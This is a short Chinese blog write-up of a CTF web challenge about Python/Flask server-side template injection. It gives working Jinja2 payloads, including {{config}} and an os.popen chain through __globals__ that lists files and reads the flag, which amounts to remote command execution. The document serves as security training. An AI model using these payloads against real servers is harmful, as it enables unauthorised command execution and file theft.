当前位置:   article > 正文

攻防世界Web_python_template_injection_攻防世界python tamp

攻防世界python tamp

提示:本人24小时在线,如有疑问,可联系我。


前言

提示:攻防世界Web_python_template_injection


一、题目?

在这里插入图片描述
感觉什么也看不出来。
在这里插入图片描述

二、解决方法

1.看看后台目录

用御剑和diresearch看看后台目录。
在这里插入图片描述

2.题目提示是python模块

直接尝试使用flask模板的漏洞试试,构造的payload为:/{{2*3}}
在这里插入图片描述
页面显示6,说明存在“SSTI” :
然后查看config文件,测试配置文件是否有被禁用,可以看到,配置文件包并没有被禁用。
构造的payload为:/{{config}}

3.查看本地服务器文件

config文件没有被禁用,接下来就简单了,直接查看服务器的本地文件有哪些,构造的的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
在这里插入图片描述
读取fl4g的相关内容信息,直接得到flag
构造的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}
在这里插入图片描述

总结

记住:
构造的payload为:/{{2*3}}。说明存在“SSTI”
查看config文件,构造的payload为:/{{config}}
查看本地服务器文件/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
读取fl4g的相关内容信息,直接得到flag
构造的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}
答案。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小惠珠哦/article/detail/809703
推荐阅读
相关标签
  

闽ICP备14008679号